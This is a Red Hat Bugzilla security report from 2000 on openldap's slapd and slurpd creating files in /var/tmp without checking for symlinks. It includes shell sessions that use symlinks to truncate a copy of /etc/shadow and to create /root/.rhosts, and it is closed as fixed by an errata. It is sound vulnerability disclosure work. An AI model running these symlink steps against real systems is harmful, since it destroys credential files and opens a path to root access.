Bug 10714

Summary: Insecure file creation using static files which follow symlinks.
Product: [Retired] Red Hat Linux Reporter: SB <satan>
Component: openldapAssignee: Nalin Dahyabhai <nalin>
Status: CLOSED ERRATA QA Contact:
Severity: medium Docs Contact:
Priority: high    
Version: 6.2CC: dr
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2000-04-24 06:41:33 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description SB 2000-04-11 00:57:44 UTC 
I was trying out the new openldap package(openldap-1.2.9-5) and I noticed
it blindly creates some files which follow symlinks and will overwrite any
file without notification. For example:

[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root          780 Apr 10 21:02 /etc/shadow.test
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:55 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
[root@king /]# ln -s /etc/shadow.test /var/tmp/NEXTID
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:55 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
lrwxrwxrwx    1 root     root           13 Apr 10 20:55 NEXTID ->
/etc/shadow.test
[root@king /]# /etc/rc.d/init.d/ldap start
Starting ldap: [  OK  ]
[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root          780 Apr 10 21:02 /etc/shadow.test
[root@king /]# /etc/rc.d/init.d/ldap stop
Shutting down ldap: [  OK  ]
[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root            2 Apr 10 21:04 /etc/shadow.test
[root@king /]#

Apparently when slapd terminates it creates the file NEXTID in /var/tmp
(actually it follows symlink from /usr/tmp).  It will create and
overwrite files.  slurpd has a similar problem:

[root@king /]# ls -al /root/.rhosts
ls: /root/.rhosts: No such file or directory
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:59 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
[root@king /]# slurpd
No replicas in slapd config file "/etc/openldap/slapd.conf"!
Error: : directory does not exist
Error: /usr/tmp/slurpd.replog: directory does not exist
Error: /usr/tmp/slurpd.status: directory does not exist
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:59 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
-rw-r--r--    1 root     root            0 Apr 10 20:59 slurpd.status
[root@king /]#
[root@king /]# rm /var/tmp/slurpd.status
[root@king /]# ln -s /root/.rhosts /var/tmp/slurpd.status
[root@king /]# slurpd
No replicas in slapd config file "/etc/openldap/slapd.conf"!
Error: : directory does not exist
Error: /usr/tmp/slurpd.replog: directory does not exist
Error: /usr/tmp/slurpd.status: directory does not exist
[root@king /]# ls -al /root/.rhosts
-rw-r--r--    1 root     root            0 Apr 10 21:01 /root/.rhosts
[root@king /]#

slurpd to my knowledge will only create files, it will not overwrite or
truncate previously existing files.  Also after slapd is running if you
type slurpd, it will try to read from /var/tmp/slurpd.status fail and then
write to /var/tmp/slurpd.status.lock which can be a symlink to any file you
wish to create and truncate any existing file to 0 bytes.  There are other
instances I noticed in the code such /tmp/slurpd.dump and other files that
probably behanve the same. Not good.

-Stan Bubrouski
Comment 1 Cristian Gafton 2000-04-24 06:41:59 UTC 
Errata released that fixes the problem.